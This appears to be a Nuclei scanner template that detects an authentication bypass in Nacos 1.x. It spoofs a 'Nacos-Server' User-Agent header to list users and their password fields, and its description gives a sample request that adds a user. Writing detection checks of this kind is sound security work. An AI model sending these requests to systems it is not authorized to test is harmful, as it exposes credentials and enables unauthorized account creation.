id: nacos-unauth

info:
  name: Nacos 1.x - Authentication Bypass
  author: taielab,pikpikcu
  severity: critical
  description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data."
  reference:
    - https://github.com/alibaba/nacos/issues/4593
    - https://nacos.io/en-us/docs/auth.html
  tags: nacos,unauth

requests:
  - method: GET
    path:
      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"
    headers:
      User-Agent: Nacos-Server

    matchers-condition: and
    matchers:

      - type: word
        words:
          - "Content-Type: application/json"
        part: header

      - type: regex
        regex:
          - '"username":'
          - '"password":'
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/20